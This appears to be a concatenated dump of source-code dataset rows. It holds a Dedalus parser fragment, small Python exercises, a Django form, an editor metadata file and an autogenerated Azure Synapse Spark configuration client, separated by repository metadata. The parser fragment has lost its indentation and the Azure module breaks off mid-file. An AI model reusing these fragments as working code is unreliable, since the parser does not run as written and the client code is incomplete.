# collect subgoal data
currSubData[ "subgoalName" ] = subgoalName
currSubData[ "subgoalAttList" ] = subgoalAttList
currSubData[ "polarity" ] = polarity
currSubData[ "subgoalTimeArg" ] = subgoalTimeArg
# save data for this subgoal
subgoalListOfDicts.append( currSubData )
#print subgoalListOfDict
#sys.exit( "foo" )
return subgoalListOfDicts
#######################
# GET COMMA INDEXES #
#######################
# given a rule body, get the indexes of commas separating subgoals.
def getCommaIndexes( body ) :
underscoreStr = getCommaIndexes_helper( body )
indexList = []
for i in range( 0, len( underscoreStr ) ) :
if underscoreStr[i] == "," :
indexList.append( i )
return indexList
##############################
# GET COMMA INDEXES HELPER #
##############################
# replace all paren contents with underscores
def getCommaIndexes_helper( body ) :
# get the first occuring paren group
nextParenGroup = "(" + re.search(r'\((.*?)\)',body).group(1) + ")"
# replace the group with the same number of underscores in the body
replacementStr = ""
for i in range( 0, len(nextParenGroup)-2 ) :
replacementStr += "_"
replacementStr = "_" + replacementStr + "_" # use underscores to replace parentheses
body = body.replace( nextParenGroup, replacementStr )
# BASE CASE : no more parentheses
if not "(" in body :
return body
# RECURSIVE CASE : yes more parentheses
else :
return getCommaIndexes_helper( body )
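# Example (illustrative): for body 'a(X,Y),b(Y)' the helper masks the paren
# groups to 'a_____,b___', so getCommaIndexes() reports only the comma at
# index 6 that actually separates the two subgoals.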
############
# IS EQN #
############
# check if input contents from the rule body is an equation
def isEqn( sub ) :
flag = False
for op in eqnOps :
if op in sub :
flag = True
return flag
##############
# GET BODY #
##############
# return the body str from the input rule
def getBody( query ) :
body = query.replace( "notin", "___NOTIN___" )
body = body.replace( ";", "" )
body = body.translate( None, string.whitespace )
body = body.split( ":-" )
body = body[1]
body = body.replace( "___NOTIN___", " notin " )
return body
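# Example (illustrative):
# getBody( "p(X) :- q(X), notin r(X);" ) -> 'q(X), notin r(X)'
# (whitespace and the trailing semicolon are stripped; notins are preserved)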
##############################
# SANITY CHECK SYNTAX FACT #
##############################
# check fact lines for invalid syntax.
# abort if invalid syntax found.
# return True otherwise.
def sanityCheckSyntax_fact_preChecks( factLine ) :
logging.debug( " SANITY CHECK SYNTAX FACT : running process..." )
logging.debug( " SANITY CHECK SYNTAX FACT : factLine = " + str( factLine ) )
# ------------------------------------------ #
# facts must have time args.
if not "@" in factLine :
sys.exit( " SANITY CHECK SYNTAX FACT : ERROR : invalid syntax in line '" + factLine + "'\n line does not contain a time argument.\n" )
# ------------------------------------------ #
# check parentheses
if not factLine.count( "(" ) < 2 :
sys.exit( " SANITY CHECK SYNTAX FACT : ERROR : invalid syntax in line '" + factLine + "'\n line contains more than one '('\n" )
elif not factLine.count( "(" ) > 0 :
sys.exit( " SANITY CHECK SYNTAX FACT : ERROR : invalid syntax in line '" + factLine + "'\n line contains fewer than one '('\n" )
if not factLine.count( ")" ) < 2 :
sys.exit( " SANITY CHECK SYNTAX FACT : ERROR : invalid syntax in line '" + factLine + "'\n line contains more than one ')'\n" )
elif not factLine.count( ")" ) > 0 :
sys.exit( " SANITY CHECK SYNTAX FACT : ERROR : invalid syntax in line '" + factLine + "'\n line contains fewer than one ')'\n" )
return True
##########################################
# SANITY CHECK SYNTAX FACT POST CHECKS #
##########################################
# check fact lines for invalid syntax.
# abort if invalid syntax found.
# return True otherwise.
def sanityCheckSyntax_fact_postChecks( factLine, factData ) :
logging.debug( " SANITY CHECK SYNTAX FACT : running process..." )
logging.debug( " SANITY CHECK SYNTAX FACT : factData = " + str( factData ) )
# ------------------------------------------ #
# check quotes on input string data
dataList = factData[ "dataList" ]
for data in dataList :
logging.debug( " SANITY CHECK SYNTAX FACT : data = " + str( data ) + ", type( data ) = " + str( type( data) ) + "\n" )
if isString( data ) :
# check quotes
if not data.count( "'" ) == 2 and not data.count( '"' ) == 2 :
sys.exit( " SANITY CHECK SYNTAX FACT : ERROR : invalid syntax in fact '" + \
str( factLine ) + "'\n fact definition contains string data not " + \
"surrounded by either exactly two single quotes or exactly two double quotes : " + data + "\n" )
else :
pass
# ------------------------------------------ #
# check time arg
factTimeArg = factData[ "factTimeArg" ]
logging.debug( " SANITY CHECK SYNTAX FACT : factTimeArg = " + str( factTimeArg ) )
if not factTimeArg.isdigit() and \
not factTimeArg == "constant" :
sys.exit( " SANITY CHECK SYNTAX FACT : ERROR : invalid " + \
"syntax in fact data list '" + str( factLine ) + \
"'\n fact definition has no valid time arg." )
return True
###############
# IS STRING #
###############
# test if the input string contains any alphabetic characters.
# if so, then the data is a string.
def isString( testString ) :
logging.debug( " IS STRING : testString = " + str( testString ) )
alphabet = [ 'a', 'b', 'c', \
'd', 'e', 'f', \
'g', 'h', 'i', \
'j', 'k', 'l', \
'm', 'n', 'o', \
'p', 'q', 'r', \
's', 't', 'u', \
'v', 'w', 'x', \
'y', 'z' ]
flag = False
for character in testString :
if character.lower() in alphabet :
flag = True
logging.debug( " IS STRING : flag = " + str( flag ) )
return flag
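# Examples (illustrative): isString( "'node1'" ) -> True ; isString( "42" ) -> False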
###################
# PARSE DEDALUS #
###################
# input name of raw dedalus file
# output array of arrays containing the contents of parsed ded lines
def parseDedalus( dedFile, settings_path ) :
logging.debug( " PARSE DEDALUS : dedFile = " + dedFile )
parsedLines = []
# ------------------------------------------------------------- #
# remove all multiline whitespace and place all rules
# on individual lines
lineList = sanitizeFile( dedFile )
# ------------------------------------------------------------- #
# iterate over each line and parse
for line in lineList :
result = parse( line, settings_path ) # parse returns None on empty lines
if result :
parsedLines.append( result )
logging.debug( " PARSE DEDALUS : parsedLines = " + str( parsedLines ) )
return parsedLines
# ------------------------------------------------------------- #
###################
# SANITIZE FILE #
###################
# input all lines from input file
# combine all lines into a single huge string.
# to preserve syntax :
# replace semicolons with string ';___NEWLINE___'
# replace all notins with '___notin___'
# split on '___NEWLINE___'
def sanitizeFile( dedFile ) :
bigLine = ""
# "always check if files exist" -- Ye Olde SE proverb
if os.path.isfile( dedFile ) :
f = open( dedFile, "r" )
# combine all lines into one big line
for line in f :
#print "old_line = " +str( line )
line = line.replace( "//", "___THISISACOMMENT___" )
line = line.split( "___THISISACOMMENT___", 1 )[0]
#print "new_line = " +str( line )
line = line.replace( "notin", "___notin___" ) # preserve notins
line = line.replace( ";", ";___NEWLINE___" ) # preserve semicolons
line = line.translate( None, string.whitespace ) # remove all whitespace
bigLine += line
f.close()
bigLine = bigLine.replace( "___notin___", " notin " ) # restore notins
lineList = bigLine.split( "___NEWLINE___" ) # split big line into a list of lines
# remove duplicates
final_lineList = []
for line in lineList :
if not line in final_lineList :
final_lineList.append( line )
return final_lineList
else :
sys.exit( "ERROR: File at " + dedFile + " does not exist.\nAborting..." )
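# Illustrative run (assumed file contents):
# node("a")@1; // seed fact
# log(X) :- node(X);
# sanitizeFile strips the comment and all whitespace and returns
# [ 'node("a")@1;', 'log(X):-node(X);', '' ] -- the trailing empty entry is
# later ignored because parse() returns None on empty lines.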
#########
# EOF #
#########
| [
"[email protected]"
] | |
f794cd1dae5cb4ed8da0fc22286c5a047b86c2fa | d8a541a2953c9729311059585bb0fca9003bd6ef | /Lists as stack ques/cups_and_bottles.py | efc8af013cd606d663a6539b7b98d2807e6c28fc | [] | no_license | grigor-stoyanov/PythonAdvanced | ef7d628d2b81ff683ed8dd47ee307c41b2276dd4 | 0a6bccc7faf1acaa01979d1e23cfee8ec29745b2 | refs/heads/main | 2023-06-10T09:58:04.790197 | 2021-07-03T02:52:20 | 2021-07-03T02:52:20 | 332,509,767 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 604 | py | from collections import deque
cups = deque(map(int, input().split()))
bottles = list(map(int, input().split()))
wasted_water = 0
while cups and bottles:
current_cup = cups.popleft()
while current_cup > 0 and bottles:
current_bottle = bottles.pop()
current_cup -= current_bottle
if current_cup < 0:
wasted_water += -current_cup
if not cups:
print('Bottles: ', end='')
print(*[bottles.pop() for i in range(len(bottles))])
else:
print('Cups: ', end='')
print(*[cups.popleft() for i in range(len(cups))])
print(f'Wasted litters of water: {wasted_water}')
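# Illustrative run (assumed input): cups '4 2' and bottles '5 2' ->
# cup 4 drains bottle 2, then bottle 5 spills 3 litres; bottles run out first, so:
# Cups: 2
# Wasted litters of water: 3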
| [
"[email protected]"
] | |
1c6ff28e26ea56bf58d2d64410f7f7ccc128b1c3 | a51854991671a4389902945578288da34845f8d9 | /libs/Utility/__init__.py | 413df21a5385589d95b5c2ec9bf735a694a5e504 | [] | no_license | wuyou1102/DFM_B2 | 9210b4b8d47977c50d92ea77791f477fa77e5f83 | 69ace461b9b1b18a2269568110cb324c04ad4266 | refs/heads/master | 2020-04-13T18:54:20.045734 | 2019-06-17T12:46:23 | 2019-06-17T12:46:23 | 163,387,873 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 297 | py | # -*- encoding:UTF-8 -*-
from libs.Utility import Logger
import Alert as Alert
import Random as Random
from ThreadManager import append_thread
from ThreadManager import is_alive
from ThreadManager import query_thread
from Common import *
import ParseConfig as ParseConfig
from Serial import Serial | [
"[email protected]"
] | |
b9f5b0e85ced88524ab8f2e59229df6b0f93c821 | e60a342f322273d3db5f4ab66f0e1ffffe39de29 | /parts/zodiac/chameleon/__init__.py | 60fbbb344ac3c226ff2ca2148893e72d3fc26add | [] | no_license | Xoting/GAExotZodiac | 6b1b1f5356a4a4732da4c122db0f60b3f08ff6c1 | f60b2b77b47f6181752a98399f6724b1cb47ddaf | refs/heads/master | 2021-01-15T21:45:20.494358 | 2014-01-13T15:29:22 | 2014-01-13T15:29:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 75 | py | /home/alex/myenv/zodiac/eggs/Chameleon-2.13-py2.7.egg/chameleon/__init__.py | [
"[email protected]"
] | |
580dbd15bf43272f28e3f9bd42413a905510cd76 | bef304291f5fe599f7a5b713d19544dc0cecd914 | /todoapp/todo_list/forms.py | 9fe1a617dd0f429fc6c8b3c1fa6885fee975c262 | [] | no_license | coderj001/django-todo-and-air-quality | 9ca847143ea86677a0d54026c060638fabf8c042 | 012ee15fa3cfbf1aa08ae4513c3bf4fa828b3ba3 | refs/heads/master | 2020-12-14T20:20:49.845722 | 2020-01-19T15:06:42 | 2020-01-19T15:06:42 | 234,855,834 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 147 | py | from django import forms
from .models import ToDoList
class ListForm(forms.ModelForm):
class Meta:
model=ToDoList
fields=['item','completed'] | [
"[email protected]"
] | |
6b2843c0a678ffe8be10b0d147adee1740dc58da | a5f8eb72e680a906f74ae53d2b6428fbb008320c | /31-zip.py | a48620bb23a58f1ecfdebf53d239f9cf71d077e5 | [] | no_license | arn1992/Basic-Python | 0588858aed632ac9e65e5618d5b57bcbe71c45bc | 09b9bf2364ddd2341f95445e18868e2e0904604d | refs/heads/master | 2020-06-28T18:35:32.394730 | 2016-12-15T07:21:33 | 2016-12-15T07:21:33 | 74,483,622 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 127 | py | first=['ratul','aminur','arn']
last=['tasneem','ishrar']
names=zip(first,last)
for a,b in names:
print(a,b)
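# zip() stops at the shorter list, so 'arn' is dropped above. A hedged
# alternative if every first name must be kept (standard library):
# from itertools import zip_longest
# for a, b in zip_longest(first, last, fillvalue=''):
#     print(a, b)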
| [
"[email protected]"
] | |
9b500090e5537a2b729caa78d0590d8753bbca89 | b92adbd59161b701be466b3dbeab34e2b2aaf488 | /.c9/metadata/environment/fb_post_learning/fb_post_clean_arch/views/delete_post/api_wrapper.py | 34ca1ee1bb0f47da7e80c5643b393f16129c97b8 | [] | no_license | R151865/cloud_9_files | 7486fede7af4db4572f1b8033990a0f07f8749e8 | a468c44e9aee4a37dea3c8c9188c6c06e91cc0c4 | refs/heads/master | 2022-11-22T10:45:39.439033 | 2020-07-23T09:31:52 | 2020-07-23T09:31:52 | 281,904,416 | 0 | 1 | null | 2022-11-20T00:47:10 | 2020-07-23T09:08:48 | Python | UTF-8 | Python | false | false | 480 | py | {"filter":false,"title":"api_wrapper.py","tooltip":"/fb_post_learning/fb_post_clean_arch/views/delete_post/api_wrapper.py","undoManager":{"mark":-1,"position":-1,"stack":[]},"ace":{"folds":[],"scrolltop":0,"scrollleft":0,"selection":{"start":{"row":17,"column":17},"end":{"row":17,"column":75},"isBackwards":true},"options":{"guessTabSize":true,"useWrapMode":false,"wrapToView":true},"firstLineState":0},"timestamp":1590407780811,"hash":"c7949160d2afabed4398d4df3013ec47e225082d"} | [
"[email protected]"
] | |
90352a180e75d18219b8cba394d4d2b8f03de187 | aa0270b351402e421631ebc8b51e528448302fab | /sdk/synapse/azure-synapse-artifacts/azure/synapse/artifacts/operations/_spark_configuration_operations.py | 9d5b1194a4b1cae79ac490bbe3402239b826e729 | [
"MIT",
"LGPL-2.1-or-later",
"LicenseRef-scancode-generic-cla"
] | permissive | fangchen0601/azure-sdk-for-python | d04a22109d0ff8ff209c82e4154b7169b6cb2e53 | c2e11d6682e368b2f062e714490d2de42e1fed36 | refs/heads/master | 2023-05-11T16:53:26.317418 | 2023-05-04T20:02:16 | 2023-05-04T20:02:16 | 300,440,803 | 0 | 0 | MIT | 2020-10-16T18:45:29 | 2020-10-01T22:27:56 | null | UTF-8 | Python | false | false | 33,298 | py | # pylint: disable=too-many-lines
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import sys
from typing import Any, Callable, Dict, Iterable, Optional, TypeVar, Union, cast
from azure.core.exceptions import (
ClientAuthenticationError,
HttpResponseError,
ResourceExistsError,
ResourceNotFoundError,
ResourceNotModifiedError,
map_error,
)
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.core.polling.base_polling import LROBasePolling
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.utils import case_insensitive_dict
from .. import models as _models
from .._serialization import Serializer
from .._vendor import _convert_request, _format_url_section
if sys.version_info >= (3, 8):
from typing import Literal # pylint: disable=no-name-in-module, ungrouped-imports
else:
from typing_extensions import Literal # type: ignore # pylint: disable=ungrouped-imports
T = TypeVar("T")
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
_SERIALIZER = Serializer()
_SERIALIZER.client_side_validation = False
def build_get_spark_configurations_by_workspace_request(**kwargs: Any) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
accept = _headers.pop("Accept", "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/sparkconfigurations")
# Construct parameters
_params["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
# Construct headers
_headers["Accept"] = _SERIALIZER.header("accept", accept, "str")
return HttpRequest(method="GET", url=_url, params=_params, headers=_headers, **kwargs)
def build_create_or_update_spark_configuration_request(
spark_configuration_name: str, *, if_match: Optional[str] = None, **kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
accept = _headers.pop("Accept", "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/sparkconfigurations/{sparkConfigurationName}")
path_format_arguments = {
"sparkConfigurationName": _SERIALIZER.url("spark_configuration_name", spark_configuration_name, "str"),
}
_url: str = _format_url_section(_url, **path_format_arguments) # type: ignore
# Construct parameters
_params["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
# Construct headers
if if_match is not None:
_headers["If-Match"] = _SERIALIZER.header("if_match", if_match, "str")
if content_type is not None:
_headers["Content-Type"] = _SERIALIZER.header("content_type", content_type, "str")
_headers["Accept"] = _SERIALIZER.header("accept", accept, "str")
return HttpRequest(method="PUT", url=_url, params=_params, headers=_headers, **kwargs)
def build_get_spark_configuration_request(
spark_configuration_name: str, *, if_none_match: Optional[str] = None, **kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
accept = _headers.pop("Accept", "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/sparkconfigurations/{sparkConfigurationName}")
path_format_arguments = {
"sparkConfigurationName": _SERIALIZER.url("spark_configuration_name", spark_configuration_name, "str"),
}
_url: str = _format_url_section(_url, **path_format_arguments) # type: ignore
# Construct parameters
_params["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
# Construct headers
if if_none_match is not None:
_headers["If-None-Match"] = _SERIALIZER.header("if_none_match", if_none_match, "str")
_headers["Accept"] = _SERIALIZER.header("accept", accept, "str")
return HttpRequest(method="GET", url=_url, params=_params, headers=_headers, **kwargs)
def build_delete_spark_configuration_request(spark_configuration_name: str, **kwargs: Any) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
accept = _headers.pop("Accept", "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/sparkconfigurations/{sparkConfigurationName}")
path_format_arguments = {
"sparkConfigurationName": _SERIALIZER.url("spark_configuration_name", spark_configuration_name, "str"),
}
_url: str = _format_url_section(_url, **path_format_arguments) # type: ignore
# Construct parameters
_params["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
# Construct headers
_headers["Accept"] = _SERIALIZER.header("accept", accept, "str")
return HttpRequest(method="DELETE", url=_url, params=_params, headers=_headers, **kwargs)
def build_rename_spark_configuration_request(spark_configuration_name: str, **kwargs: Any) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
accept = _headers.pop("Accept", "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/sparkconfigurations/{sparkConfigurationName}/rename")
path_format_arguments = {
"sparkConfigurationName": _SERIALIZER.url("spark_configuration_name", spark_configuration_name, "str"),
}
_url: str = _format_url_section(_url, **path_format_arguments) # type: ignore
# Construct parameters
_params["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
# Construct headers
if content_type is not None:
_headers["Content-Type"] = _SERIALIZER.header("content_type", content_type, "str")
_headers["Accept"] = _SERIALIZER.header("accept", accept, "str")
return HttpRequest(method="POST", url=_url, params=_params, headers=_headers, **kwargs)
class SparkConfigurationOperations:
"""
.. warning::
**DO NOT** instantiate this class directly.
Instead, you should access the following operations through
:class:`~azure.synapse.artifacts.ArtifactsClient`'s
:attr:`spark_configuration` attribute.
"""
models = _models
def __init__(self, *args, **kwargs):
input_args = list(args)
self._client = input_args.pop(0) if input_args else kwargs.pop("client")
self._config = input_args.pop(0) if input_args else kwargs.pop("config")
self._serialize = input_args.pop(0) if input_args else kwargs.pop("serializer")
self._deserialize = input_args.pop(0) if input_args else kwargs.pop("deserializer")
@distributed_trace
def get_spark_configurations_by_workspace(self, **kwargs: Any) -> Iterable["_models.SparkConfigurationResource"]:
"""Lists sparkconfigurations.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either SparkConfigurationResource or the result of
cls(response)
:rtype:
~azure.core.paging.ItemPaged[~azure.synapse.artifacts.models.SparkConfigurationResource]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
cls: ClsType[_models.SparkConfigurationListResponse] = kwargs.pop("cls", None)
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_get_spark_configurations_by_workspace_request(
api_version=api_version,
template_url=self.get_spark_configurations_by_workspace.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
path_format_arguments = {
"endpoint": self._serialize.url(
"self._config.endpoint", self._config.endpoint, "str", skip_quote=True
),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
else:
request = HttpRequest("GET", next_link)
request = _convert_request(request)
path_format_arguments = {
"endpoint": self._serialize.url(
"self._config.endpoint", self._config.endpoint, "str", skip_quote=True
),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("SparkConfigurationListResponse", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem) # type: ignore
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response: PipelineResponse = self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
return pipeline_response
return ItemPaged(get_next, extract_data)
get_spark_configurations_by_workspace.metadata = {"url": "/sparkconfigurations"}
def _create_or_update_spark_configuration_initial(
self,
spark_configuration_name: str,
properties: _models.SparkConfiguration,
if_match: Optional[str] = None,
**kwargs: Any
) -> Optional[_models.SparkConfigurationResource]:
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
content_type: str = kwargs.pop("content_type", _headers.pop("Content-Type", "application/json"))
cls: ClsType[Optional[_models.SparkConfigurationResource]] = kwargs.pop("cls", None)
_spark_configuration = _models.SparkConfigurationResource(properties=properties)
_json = self._serialize.body(_spark_configuration, "SparkConfigurationResource")
request = build_create_or_update_spark_configuration_request(
spark_configuration_name=spark_configuration_name,
if_match=if_match,
api_version=api_version,
content_type=content_type,
json=_json,
template_url=self._create_or_update_spark_configuration_initial.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
path_format_arguments = {
"endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response: PipelineResponse = self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize("SparkConfigurationResource", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_spark_configuration_initial.metadata = {"url": "/sparkconfigurations/{sparkConfigurationName}"}
@distributed_trace
def begin_create_or_update_spark_configuration(
self,
spark_configuration_name: str,
properties: _models.SparkConfiguration,
if_match: Optional[str] = None,
**kwargs: Any
) -> LROPoller[_models.SparkConfigurationResource]:
"""Creates or updates a sparkconfiguration.
:param spark_configuration_name: The spark Configuration name. Required.
:type spark_configuration_name: str
:param properties: Properties of Spark Configuration. Required.
:type properties: ~azure.synapse.artifacts.models.SparkConfiguration
:param if_match: ETag of the sparkConfiguration entity. Should only be specified for update,
for which it should match existing entity or can be * for unconditional update. Default value
is None.
:type if_match: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be LROBasePolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns either SparkConfigurationResource or the result
of cls(response)
:rtype:
~azure.core.polling.LROPoller[~azure.synapse.artifacts.models.SparkConfigurationResource]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
content_type: str = kwargs.pop("content_type", _headers.pop("Content-Type", "application/json"))
cls: ClsType[_models.SparkConfigurationResource] = kwargs.pop("cls", None)
polling: Union[bool, PollingMethod] = kwargs.pop("polling", True)
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token: Optional[str] = kwargs.pop("continuation_token", None)
if cont_token is None:
raw_result = self._create_or_update_spark_configuration_initial(
spark_configuration_name=spark_configuration_name,
properties=properties,
if_match=if_match,
api_version=api_version,
content_type=content_type,
cls=lambda x, y, z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop("error_map", None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize("SparkConfigurationResource", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
"endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True),
}
if polling is True:
polling_method: PollingMethod = cast(
PollingMethod, LROBasePolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
)
elif polling is False:
polling_method = cast(PollingMethod, NoPolling())
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method) # type: ignore
begin_create_or_update_spark_configuration.metadata = {"url": "/sparkconfigurations/{sparkConfigurationName}"}
@distributed_trace
def get_spark_configuration(
self, spark_configuration_name: str, if_none_match: Optional[str] = None, **kwargs: Any
) -> Optional[_models.SparkConfigurationResource]:
"""Gets a sparkConfiguration.
:param spark_configuration_name: The spark Configuration name. Required.
:type spark_configuration_name: str
:param if_none_match: ETag of the sparkConfiguration entity. Should only be specified for get.
If the ETag matches the existing entity tag, or if * was provided, then no content will be
returned. Default value is None.
:type if_none_match: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: SparkConfigurationResource or None or the result of cls(response)
:rtype: ~azure.synapse.artifacts.models.SparkConfigurationResource or None
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
cls: ClsType[Optional[_models.SparkConfigurationResource]] = kwargs.pop("cls", None)
request = build_get_spark_configuration_request(
spark_configuration_name=spark_configuration_name,
if_none_match=if_none_match,
api_version=api_version,
template_url=self.get_spark_configuration.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
path_format_arguments = {
"endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response: PipelineResponse = self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 304]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize("SparkConfigurationResource", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_spark_configuration.metadata = {"url": "/sparkconfigurations/{sparkConfigurationName}"}
def _delete_spark_configuration_initial( # pylint: disable=inconsistent-return-statements
self, spark_configuration_name: str, **kwargs: Any
) -> None:
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
cls: ClsType[None] = kwargs.pop("cls", None)
request = build_delete_spark_configuration_request(
spark_configuration_name=spark_configuration_name,
api_version=api_version,
template_url=self._delete_spark_configuration_initial.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
path_format_arguments = {
"endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response: PipelineResponse = self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
_delete_spark_configuration_initial.metadata = {"url": "/sparkconfigurations/{sparkConfigurationName}"}
@distributed_trace
